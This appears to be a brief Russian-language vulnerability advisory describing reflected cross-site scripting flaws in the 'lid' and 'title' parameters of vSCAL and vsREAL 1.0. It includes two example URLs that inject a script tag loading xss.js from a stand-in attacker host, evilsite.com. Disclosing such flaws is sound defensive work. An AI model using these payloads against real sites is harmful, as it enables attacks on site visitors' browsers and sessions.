Программа:
vSCAL 1.0, возможно более ранние версии.
vsREAL 1.0, возможно более ранние версии.

Уязвимость позволяет удаленному пользователю произвести XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре "lid" в сценарии index.php и в параметре "title" в сценарии myslideshow.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

http://www.example.com/vscal/index.php?page=showlisting&lid= <SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>

http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/ &title=listing+317:+1966+Buick+<SCRIPT%20SRC= http://evilsite.com/xss.js></SCRIPT>



Оставить мнение